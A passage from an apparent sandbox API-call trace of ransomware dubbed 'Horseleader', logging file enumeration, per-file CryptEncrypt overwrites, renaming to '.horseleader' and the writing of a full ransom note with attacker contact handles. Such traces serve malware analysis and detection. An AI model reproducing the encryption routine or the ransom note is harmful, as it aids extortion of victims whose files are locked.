lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.298] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.299] CloseHandle (hObject=0x1a4) returned 1 [0246.299] GetProcessHeap () returned 0x780000 [0246.299] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.299] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF.horseleader") returned 90 [0246.299] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif.horseleader")) returned 1 [0246.300] GetProcessHeap () returned 0x780000 [0246.300] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.300] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xa90c, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0246.300] lstrcmpiW 
(lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0246.300] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 79 [0246.300] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0246.300] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0246.300] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0246.301] lstrlenW (lpString=".testttjffg") returned 11 [0246.301] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0246.301] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.301] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.301] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.305] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 79 [0246.305] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0246.305] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=43276) returned 1 [0246.306] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.308] 
SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.308] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.309] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.312] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.312] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.312] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x90c, lpOverlapped=0x0) returned 1 [0246.312] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff6f4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.312] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x90c, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x90c, lpOverlapped=0x0) returned 1 [0246.313] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.313] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, 
lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.313] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.313] CloseHandle (hObject=0x1a4) returned 1 [0246.314] GetProcessHeap () returned 0x780000 [0246.314] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.314] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG.horseleader") returned 91 [0246.314] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png.horseleader")) returned 1 [0246.315] GetProcessHeap () returned 0x780000 [0246.315] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.315] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xa90c, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0246.315] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0246.315] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\#Decrypt#.txt") returned 80 [0246.315] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0246.316] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. 
\r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0246.316] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0246.317] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0246.318] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: 
lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0246.318] CloseHandle (hObject=0x158) returned 1 [0246.318] GetProcessHeap () returned 0x780000 [0246.318] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0246.318] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c2ab50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="CANYON", cAlternateFileName="")) returned 1 [0246.318] lstrcmpiW (lpString1="CANYON", lpString2="Windows") returned -1 [0246.318] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON") returned 66 [0246.318] lstrcmpW (lpString1="CANYON", lpString2=".") returned 1 [0246.318] lstrcmpW (lpString1="CANYON", lpString2="..") returned 1 [0246.319] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0246.319] GetProcessHeap () returned 0x780000 [0246.319] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0246.319] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\*") returned 68 [0246.319] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c2ab50, ftCreationTime.dwHighDateTime=0x1d301bf, 
ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0246.320] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0246.320] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\.") returned 68 [0246.321] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0246.321] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c2ab50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0246.321] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0246.321] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\..") returned 69 [0246.321] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0246.321] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0246.321] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb876200, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51c2ab50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xeb876200, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xaec9, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, 
cFileName="CANYON.ELM", cAlternateFileName="")) returned 1 [0246.321] lstrcmpiW (lpString1="CANYON.ELM", lpString2="Windows") returned -1 [0246.321] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM") returned 77 [0246.321] StrStrIW (lpFirst="CANYON.ELM", lpSrch=".horseleader") returned 0x0 [0246.321] lstrcmpW (lpString1="CANYON.ELM", lpString2="#Decrypt#.txt") returned 1 [0246.321] lstrcmpW (lpString1="CANYON.ELM", lpString2="_uninstalling_.png") returned 1 [0246.321] lstrlenW (lpString=".testttjffg") returned 11 [0246.322] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM", lpSrch=".testttjffg") returned 0x0 [0246.322] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.322] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.322] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\canyon.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.323] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM") returned 77 [0246.324] StrStrW (lpFirst="CANYON.ELM", lpSrch=".txt") returned 0x0 [0246.324] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=44745) returned 1 [0246.324] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, 
lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.327] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.328] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.328] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.328] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.328] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.329] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0xec9, lpOverlapped=0x0) returned 1 [0246.329] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff137, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.329] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0xec9, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0xec9, lpOverlapped=0x0) returned 1 [0246.329] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.329] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, 
lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.330] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.330] CloseHandle (hObject=0x1a4) returned 1 [0246.330] GetProcessHeap () returned 0x780000 [0246.330] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.330] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM.horseleader") returned 89 [0246.330] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\canyon.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\canyon.elm.horseleader")) returned 1 [0246.331] GetProcessHeap () returned 0x780000 [0246.331] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.331] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x603362b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1d1, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="CANYON.INF", cAlternateFileName="")) returned 1 [0246.331] lstrcmpiW (lpString1="CANYON.INF", lpString2="Windows") returned -1 
[0246.331] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.INF") returned 77 [0246.331] StrStrIW (lpFirst="CANYON.INF", lpSrch=".horseleader") returned 0x0 [0246.331] lstrcmpW (lpString1="CANYON.INF", lpString2="#Decrypt#.txt") returned 1 [0246.331] lstrcmpW (lpString1="CANYON.INF", lpString2="_uninstalling_.png") returned 1 [0246.331] lstrlenW (lpString=".testttjffg") returned 11 [0246.331] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.INF", lpSrch=".testttjffg") returned 0x0 [0246.332] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.332] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.332] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\canyon.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.333] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.INF") returned 77 [0246.333] StrStrW (lpFirst="CANYON.INF", lpSrch=".txt") returned 0x0 [0246.333] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=465) returned 1 [0246.334] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1d1, lpOverlapped=0x0) returned 1 [0246.336] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffe2f, lpNewFilePointer=0xffffffff, 
